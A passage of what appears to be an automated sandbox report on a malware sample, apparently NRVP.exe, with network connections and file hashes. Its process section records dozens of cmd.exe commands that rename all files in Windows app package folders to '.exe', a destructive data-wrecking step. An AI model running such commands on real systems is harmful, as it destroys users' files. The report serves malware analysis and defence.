"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
C:\Users\Admin\Desktop\WriteConvertTo.exe
"C:\Users\Admin\Desktop\WriteConvertTo.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 52.194.44.20.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| DE | 2.16.241.76:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 76.241.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 206.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.google.com | udp |
| NL | 172.217.168.197:443 | mail.google.com | tcp |
| NL | 172.217.168.197:443 | mail.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 197.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.250.179.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| NL | 142.250.179.145:443 | csp.withgoogle.com | tcp |
| NL | 142.250.179.193:443 | lh3.googleusercontent.com | tcp |
| NL | 142.250.179.193:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.250.142.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| NL | 142.250.179.206:443 | accounts.youtube.com | udp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| NL | 142.251.36.3:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 3.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.250.179.214:443 | i.ytimg.com | tcp |
| NL | 172.217.168.206:443 | apis.google.com | udp |
| NL | 142.250.179.206:443 | accounts.youtube.com | udp |
| US | 8.8.8.8:53 | 214.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| NL | 142.250.179.198:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 172.217.168.202:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | lens.google.com | udp |
| NL | 142.251.39.110:443 | lens.google.com | tcp |
| US | 8.8.8.8:53 | 198.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 82.73.207.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| IN | 20.207.73.85:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.73.207.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | doc-0o-6c-docs.googleusercontent.com | udp |
| NL | 142.250.179.193:443 | doc-0o-6c-docs.googleusercontent.com | udp |
| NL | 142.251.36.46:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 142.251.36.46:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| IN | 20.207.73.85:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| NL | 142.250.179.138:443 | jnn-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | jnn-pa.googleapis.com | tcp |
| NL | 142.251.36.46:443 | drive.google.com | udp |
| NL | 142.251.36.46:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | doc-0c-6c-docs.googleusercontent.com | udp |
| NL | 142.250.179.193:443 | doc-0c-6c-docs.googleusercontent.com | udp |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | tcp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.214.58.216.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2f16dc1c0011a2495076e341841dd656 |
| SHA1 | 6bc25595527e5f27c893f2f140fcd9591e3daa14 |
| SHA256 | 6185971cce6829fb948a30d0d3406db1d389715886083de1d4a14b9f792aea5b |
| SHA512 | 12809c2bc1c0e13cff57aea4c09d51796aa5303857298830b91aeaff3e9384905b8ce3596456c44e9506f088f845e73f952620bb896b1196e86c2d18eb257839 |
\??\pipe\crashpad_64_TIBMDFQLAEFNQJKF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 06d23f5ba3426bdecff461da739919bd |
| SHA1 | 303fe3bc76c7253e2add5aecc6c6b1c324d287b2 |
| SHA256 | 213691c7ffdff4a620253d06b6277dbd672af29a4b446c5d0af57f806b3dcf64 |
| SHA512 | c9cf689f552003cdb5b8bb27620aaed1cc4fa520d0b97763dfb17dc8f295b6a5d08c1f8492fef6250473cf62e30dec14dbe87474b6349e9a16bb46ddf03a9fdb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 342137e140a8f04da6b3f12b8f73318f |
| SHA1 | 51b39501d37292eed15ec4de3c1cfaf492663d3a |
| SHA256 | e75412b0ee4c39b44f18c741f56eefc67d195df4ee3f965075630303fa5d3c11 |
| SHA512 | 70b53e7a04c26dfdf12054652e9287978680b809356cf7accbed6b84bb298adc7c89435a9980bcd09469d787ff5c2e30a83d572b29171c24ac0cacfdbefecff3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 4ebc570ee8f5fdc195ec374e88e8f746 |
| SHA1 | 4d2c35a7cfd60c0735e3ae3fcb538f93eff2cedd |
| SHA256 | 49daddb76d41fa560b745938f815071dce4ad957072b8feba22aa12263dedad9 |
| SHA512 | ff5d930200d8b4a1e41fd1eebab3a191ea472c2475ac5ad655343649d62661478cfa9e8ae2ae9b81dab66b2cd058906ae54d904ed67138ba3c8d29d89270508f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 031da7c233e03e94f8786809d9f75546 |
| SHA1 | 7da427103006412e1a1a32a1e6bb8c725607d1af |
| SHA256 | 0a90b263813ae49127da9cbddf364ee86d74a8274c2e26ca6ce31ef696a7fdd9 |
| SHA512 | 689570358397eab9d28eae08147258d90691d7f822fe16e1fef52ffd4272a2278fe6ecae9c9976560b3730c6978a7636d74a9fd89d5dea41f907f6de34757b0e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7b773e037b4d78549aa8a664299b5d4e |
| SHA1 | bea3b5058280406e0184d41fbc3b176e17e68a5b |
| SHA256 | aab44a12d04bf176bc6330b3f15857973d43338a11e5f9b81690c6884450d1d7 |
| SHA512 | 006c0b5afc3225167b51ddfc94f6cac3ddb787126798d9d95cc2a8430578bf35f4b4d0b361ec08d371d83fa9b1b2d613d900ae09c93751a33dffa70c39221e91 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c86672ad3135f1ce063985e81927bc27 |
| SHA1 | ba861940dd17ce01e9a04327bb5ee5bdea4dd6b6 |
| SHA256 | add3e9c745db58e4e55e6300e90942e750a208d7f1e76e1d10443b9632356e0e |
| SHA512 | 4a8f09875ff1b8ca346ac9c6f553f412adfa366ec8fd4139bd5745d3b91e45fae734042654da507d4e924ae8ae4b70202d9fe01580145029c84ec28becbb876b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f4b62794f97ad2db8046c09fc8b611bf |
| SHA1 | 5e8f1f835f1195d5d0c790205ddbc8fcc886444e |
| SHA256 | bbbb8cf2138462227ddda66ffebfa181dc9a8647d61f7b196caf3154ed7ac20b |
| SHA512 | 5d612d366888e7267538d98b0e64ab33673d7048d164b1dfb3a930f7a51cd28367d4a30859c306438ab760ea2e098160211f1bee7df476c31c989bac5e67caaa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020
| MD5 | 47ae9b25af86702d77c7895ac6f6b57c |
| SHA1 | f56f78729b99247a975620a1103cac3ee9f313a5 |
| SHA256 | 9bde79a1b0866f68d6baa43f920e971b5feb35a8e0af7ffadc114366f8538224 |
| SHA512 | 72b5296e3dd1c5b4c42d8c3e4a56693819779167b9f02bc2d5f5a626b519a9cf10bee59846d614c929c42094b65d13039f6024f6cb1c023e740969aaefd060c4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae1bccd6831ebfe5ad03b482ee266e4f |
| SHA1 | 01f4179f48f1af383b275d7ee338dd160b6f558a |
| SHA256 | 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649 |
| SHA512 | baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5df31d.TMP
| MD5 | 13436f3855223bb7c97364f8b0d9d7cc |
| SHA1 | 3fca53c17c1998774ddc41cc740ade7b5490fe1a |
| SHA256 | 372fd89a50418036479564586877e2b719d13a78e1d8b8d5f36c2af43bb5cdcf |
| SHA512 | 3e00a49042dd12dcdc735736ed4090e665164e2b46201d79af0875ec7c88714a711705a0745da7cc0a9966efe327de1fa62e3dd9ee7ae30568bf35ab8fe4a1be |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 94050452d9308b20ee91495458370271 |
| SHA1 | 9960ff65ad36218f78081db9e149db5074920d58 |
| SHA256 | e6fa901a3efdfd3b8a8010033c96e940ec99677fc2dba78f1c4842031f144f36 |
| SHA512 | 327c510a451d6052271570d1e36a60ecac352395789137be7aea9ca8c27be117db53c135c59a17a6863c9866529693db902fd3e4f0186fe2c5724237882fd870 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2689c24157c58c7e38e3f7e50d634325 |
| SHA1 | 5ea6980f842deac939b4e2fe14ed4aac9b48c27a |
| SHA256 | 4099ca61feca43c2e408410dc310ca2942ae7e6fc5fb62dbb0c8be872b2ef999 |
| SHA512 | 04f258aa36bc23b2b1e2186f569900df0106222d423a2d686843c8825e7e2f2bbef8254cdcd8837d0e2dc109d8ce64be29e5e11bf80b9734cbd6ef0cfed88c08 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | ec6002f2e685b87f6e70c7b433cd90c0 |
| SHA1 | c989f60449ca6246d9b8c43425ff8a61e6f51517 |
| SHA256 | 6cc8f6950565efa8a341ef4fdb20b0a1331d0673861dde3a6c0c035875e05986 |
| SHA512 | 1b0312610057a46fbff58f5497f81e9d10cb85176b8472548be4759aed318fd445f8837f691587aff2e15ec7f7a851485d9785c80f6442354b4e3363ed17eca4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5e19df.TMP
| MD5 | 8abba822d100688b33825a7e33b18d93 |
| SHA1 | d09eb411e75caf9060d299544928a912b2c61ce6 |
| SHA256 | 82b1ef3b74fa36a9d14a18bbd08d0b31fdf65f350627bd58d1c67859896fe167 |
| SHA512 | c4b95986ae749ebc58423dcdf1ea247b55211255f8b216740e0d6bd9e2e4fbd4b9356f85fb97b8cd8fb1a1696f495142afcb66868295a2ab892a3099ef53b110 |
C:\Users\Admin\Downloads\MrsMajor 3.0.7z.crdownload
| MD5 | fedb45ddbd72fc70a81c789763038d81 |
| SHA1 | f1ed20c626d0a7ca2808ed768e7d7b319bc4c84a |
| SHA256 | eacd5ed86a8ddd368a1089c7b97b791258e3eeb89c76c6da829b58d469f654b2 |
| SHA512 | 813c0367f3aeceea9be02ffad4bfa8092ea44b428e68db8f3f33e45e4e5e53599d985fa79a708679b6957cbd04d9b9d67b288137fa71ac5a59e917b8792c8298 |
C:\Users\Admin\Downloads\NRVP.exe
| MD5 | 707d5ee2926ad6b66269939998b97bdc |
| SHA1 | 7d782e13e7c692b35b67e3a2f819ec3fa7e8de5c |
| SHA256 | 9f16bde693d793d6285d03f61639d336d1cc24073350f3ba1a3be9e3579f41be |
| SHA512 | 84cc41e8e33237d12de0752257bd59ca1209f17d8c0b6a27a0462ecddf26c988f36d741ab4515029d0b3698eedf453c0eea2e85bb1076703f9f579a41b1f82fd |
C:\Users\Admin\Downloads\NRVP.exe
| MD5 | 707d5ee2926ad6b66269939998b97bdc |
| SHA1 | 7d782e13e7c692b35b67e3a2f819ec3fa7e8de5c |
| SHA256 | 9f16bde693d793d6285d03f61639d336d1cc24073350f3ba1a3be9e3579f41be |
| SHA512 | 84cc41e8e33237d12de0752257bd59ca1209f17d8c0b6a27a0462ecddf26c988f36d741ab4515029d0b3698eedf453c0eea2e85bb1076703f9f579a41b1f82fd |
C:\Users\Admin\Downloads\NRVP.exe
| MD5 | 707d5ee2926ad6b66269939998b97bdc |
| SHA1 | 7d782e13e7c692b35b67e3a2f819ec3fa7e8de5c |
| SHA256 | 9f16bde693d793d6285d03f61639d336d1cc24073350f3ba1a3be9e3579f41be |
| SHA512 | 84cc41e8e33237d12de0752257bd59ca1209f17d8c0b6a27a0462ecddf26c988f36d741ab4515029d0b3698eedf453c0eea2e85bb1076703f9f579a41b1f82fd |
memory/1336-529-0x00000000007A0000-0x00000000007A8000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9c253443a23c8c6eb22748ed3f30dab3 |
| SHA1 | acae3fe615a4966aa9824930de6c86fe200b0f31 |
| SHA256 | b84edf3cc1a34743512e465a19ee9de18f8eb3d5ae7eaf61676d4072997911a5 |
| SHA512 | 5684846d9fcb13b6d7bb064fd6563aab13e4be4b874b00f1e68d62139aef46d460dcd87e01c4792e886f6930db4ebccd36a7193e1aee808facc55ee2aeea04cf |
C:\Users\Admin\AppData\Local\Temp\NRVP590\.hta
| MD5 | 43e1cb7107abfae94fb28b43ed40d589 |
| SHA1 | 0fc1d8b4d89b0bd9d6f924892f1df63e191d3d74 |
| SHA256 | f18a7f7bee15560e5ed5fad44c2304151d30207a2d33206ad3bc2484662cfcf5 |
| SHA512 | ed4e3a007b69c0801da5fcf249d786f7d27fcf8958b388a4a775f48d7578b47f78c947092a2df2cd0f9f406e7b7299fbc7867b4cf4d8c9065359319f69721282 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ac73c66084883c0e707dd0d98ade36e4 |
| SHA1 | 68737d5c816e5fa543eb7ffd8509f7667cc2f683 |
| SHA256 | 9dd45f7d366d62c19f6ce5022a6065169d6ee56d55ac875f55c0aa1ffe8207b9 |
| SHA512 | 5644022f194c87c61df24b8e4c6f00aff6d9483d6a01c167edf59c02b9e8ac764df62b32e56c7d28520b1ba48b83d8a465a895f1390aed34e9cb3d81434b6660 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ae0a8f76eedf6761a9c199bea72320b5 |
| SHA1 | 924154fa8e0d7810c39ff634f46972ae18b80f25 |
| SHA256 | c676be0fe6596b9d62acefe3a0f80be670db6c82fe42a44e7ee9ba2c6803eada |
| SHA512 | 2babbdef196245576f5705ece219a22b9c3921017574f9e5e2b34487e4f3b32b87747ae2dc6eb038af31d287d9994bbc126169d2ca44f5dae11e788cde91db9d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | b5310f6197aa055a2d500b60502bc7b5 |
| SHA1 | 40c42b6900dd02d0ce7b69530958436b6d1d2bc5 |
| SHA256 | 8fb51f83702020ffac031cebd0d2453d7fedd900541e931769b007497bd20382 |
| SHA512 | 0f5fc0cf686e8cdff1a94d4e4d0f14b17645bca423f9dcaac0868e6270141c4f5754372bda2ab7506c0a6291d22dc6936c612f52232e932854c8ca5d814a2fe3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a9bf92c67bceae6993e72185fcf1b273 |
| SHA1 | cbbeb21163b1e36f54c1d3b89fff318d25b95006 |
| SHA256 | a88e405f3c486ec92abe6994df02591346a7d090ebdbd26c807ee44499119801 |
| SHA512 | 52b9642d4ab14403aa7a113ede2a2d85bf15603f5d36139673a77279d9de53a593176ae5c3c614eaf81bbf3d2229d1a3a772eb9286050eb2eb23d96ff5cbba21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2b150a1917912a92a50a911fc016686d |
| SHA1 | 339e7e48796f583e452af675e3e52c7456a3b198 |
| SHA256 | a12f06f5da67e439be5fb8b50c5e42638695a063d1890087a6739f9992ad8714 |
| SHA512 | 16feb113f4b034feaac9c35d6020eed34b8541b787f53251f9dfa7e94f6858fa1e91e428be45681320f4c86581f5bf716600ffdb45dcd7e449908eed20bded8b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c3070def907702e814377ffa8079b8f9 |
| SHA1 | c686308db2c2ee6401d6b97db17745c15e39ded9 |
| SHA256 | 695824558a027eaefc38914e35cdaebfcfe328ca8025118766ca434aef765084 |
| SHA512 | 3554206091c841812edcaee234771df819729e49cfc67370b45083f32b22b9ac8d9294ac4abdea1ca81db5bc34108e8758aac4a68c1210565dd48b3b012afba3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fc0d8a1fd1bb352afea82308c8529257 |
| SHA1 | 6b5e4c9c04b9bbe1c2634c38a4ce40563c7d430a |
| SHA256 | f655355f86c935299e2163e06224a9f751d5dfbd55649f12950a5208b391fc46 |
| SHA512 | f4dea400db00d353c15f822a86880ab381017a8e7f2b18b397f28ee08cd92b846d2599f243b4899fdad36ec2b26015c9dd64ac6db1b2f4ab1b523a80273df552 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5771c9b9f6e9e6c30c96fd388a7a12e0 |
| SHA1 | d481c86bc8fbab5197bf6162edb40eb07ff4428f |
